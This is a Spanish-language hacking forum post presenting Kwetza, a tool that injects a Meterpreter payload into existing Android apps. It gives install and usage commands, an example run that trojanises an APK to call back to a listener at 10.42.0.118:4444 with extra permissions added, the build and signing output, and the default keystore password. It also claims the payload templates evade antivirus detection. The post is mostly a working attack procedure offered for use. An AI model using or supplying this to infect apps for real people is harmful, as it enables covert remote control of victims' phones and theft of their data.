Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: ANTRAX en Julio 17, 2017, 12:08:55 PM

Título: Kwetza - Inyecta Payloads en Aplicaciones Android
Publicado por: ANTRAX en Julio 17, 2017, 12:08:55 PM
(https://s3.amazonaws.com/cp-s3/wp-content/uploads/2017/06/02225108/Infect-Android-Application-With-Meterpreter-Payload-kwetza.jpg)

Kwetza es una herramienta que le permite infectar una aplicación Android existente con un payload Meterpreter.

¿Qué hace?

Kwetza infecta una aplicación Android existente con plantillas de payloads personalizadas o predeterminadas para evitar la detección por antivirus. Kwetza te permite infectar las aplicaciones de Android utilizando los permisos predeterminados de la aplicación de destino o inyectar permisos adicionales para obtener funcionalidad adicional.

Instalación

Código (bash) [Seleccionar]
git clone https://github.com/sensepost/kwetza.git

Kwetza está escrito en Python y requiere BeautifulSoup que se puede instalar usando Pip:

Código (bash) [Seleccionar]
pip install beautifulsoup4

Kwetza requiere que Apktool sea instalado y accesible a través de su PATH. Esto se puede configurar usando las instrucciones de instalación que se encuentran aquí: https://ibotpeaches.github.io/Apktool/install

Modo de uso:

Código (bash) [Seleccionar]
python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no

    nameOfTheApkToInfect.apk =name of the APK you wish to infect.
    LHOST =IP of your listener.
    LPORT =Port of your listener.
    yes =include "yes" to inject additional evil perms into the app, "no" to utilize the default permissions of the app.

python kwetza.py hackme.apk 10.42.0.118 4444 yes

Código (text) [Seleccionar]
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK

[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS

[*] BYTING COMMS...

[*] ANALYZING ANDROID MANIFEST...

[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity

[*] INJECTION INTO APK

[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK

[*] EXECUTING APKTOOL BUILD COMMAND

[+] BUILD RESULT

############################################

I: Using APktool 2.2.0

I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...

###########################################

[*] EXECUTING JARSIGNER COMMAND...

Enter Passphrase for keystore: password

[+] JARSIGNER RESULT

###########################################

jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk


Información

Kwetza ha sido desarrollado para trabajar con Python 2.
Kwetza usará por defecto la plantilla y el keystore ubicados en la carpeta "payload" para inyectar y firmar el apk infectado.
Si desea firmar la aplicación infectada con su propio certificado, genere un nuevo keystore y colóquelo en la carpeta "payload" y cambie el nombre al keystore existente o cambie la referencia en kwetza.py.
Lo mismo se puede hacer para las plantillas de payload.
La contraseña para el keystore predeterminado es, "password".

Descarga: https://github.com/sensepost/kwetza